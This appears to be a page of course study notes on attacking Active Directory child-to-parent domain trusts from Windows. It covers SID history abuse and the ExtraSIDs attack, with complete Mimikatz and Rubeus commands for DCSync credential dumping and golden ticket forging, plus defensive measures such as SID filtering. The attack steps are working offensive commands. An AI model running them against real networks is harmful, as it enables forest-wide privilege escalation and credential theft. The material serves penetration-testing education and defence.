25.Attacking Domain Trusts - Child - Parent Trusts - from Windows

I. SID History Primer

Purpose:

  • Used in Active Directory migrations to retain access to resources from the original domain after a user is migrated.

Mechanism:

  • The original user's Security Identifier (SID) is stored in the sidHistory attribute of the new account in the target domain.

Abuse Potential:

  • Attackers can inject privileged SIDs into the sidHistory attribute of a compromised account.

  • This allows privilege escalation by impersonating high-privilege users or groups.

II. ExtraSIDs Attack - Mimikatz

Concept:

  • Exploits the absence of SID filtering within an Active Directory forest to escalate privileges.

  • Injects the SID of the Enterprise Admins group into a user's sidHistory attribute.

  • Grants the attacker Enterprise Admin privileges within the parent domain.

Requirements:

  • KRBTGT hash of the child domain.

  • SID of the child domain.

  • Name of a target user in the child domain (can be nonexistent).

  • FQDN of the child domain.

  • SID of the Enterprise Admins group in the parent domain.

Attack Steps:

  1. Obtain KRBTGT hash:

    lsadump::dcsync /user:LOGISTICS\krbtgt

  2. Retrieve Child Domain SID:

    Get-DomainSID

  3. Retrieve Enterprise Admins SID:

    Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

    OR

    Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"

  4. Execute ExtraSIDs Attack using Mimikatz:

    kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

  5. Verify the Ticket:

    klist

  6. Access Parent Domain Resources:

    dir \\academy-ea-dc01.inlanefreight.local\c$

III. ExtraSIDs Attack - Rubeus

Concept:

  • An alternative method for executing the ExtraSIDs attack.

Attack Steps:

  1. Gather Required Data (Same as Mimikatz).

  2. Perform ExtraSIDs Attack using Rubeus:

    .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

  3. Verify Ticket in Memory:

    klist

  4. Perform DCSync Attack or Other Privileged Actions:

    lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL

IV. Security Considerations & Defense Strategies

  • Enable SID Filtering:

    • Prevents SID injection across trusts.

    • Command:

      netdom trust TrustingDomain /domain:TrustedDomain /quarantine:yes

  • Monitor for Unauthorized SID History Modifications:

    • Track changes in event logs (Event ID 4765 & 4766).

  • Restrict Privileged Group Membership:

    • Minimize Enterprise Admins and Domain Admins group membership.

  • Implement Tiered Administration Model:

    • Reduce exposure of high-privilege accounts to compromise.

  • Regularly Audit Trust Relationships:

    • Identify and remediate unnecessary or insecure trusts.

By understanding and securing against SID History and ExtraSIDs abuse, organizations can reduce the risk of privilege escalation and domain compromise.

Previous24.Domain Trusts PrimerNext26. Attacking Domain Trusts - Child - Parent Trusts - from Linux

Last updated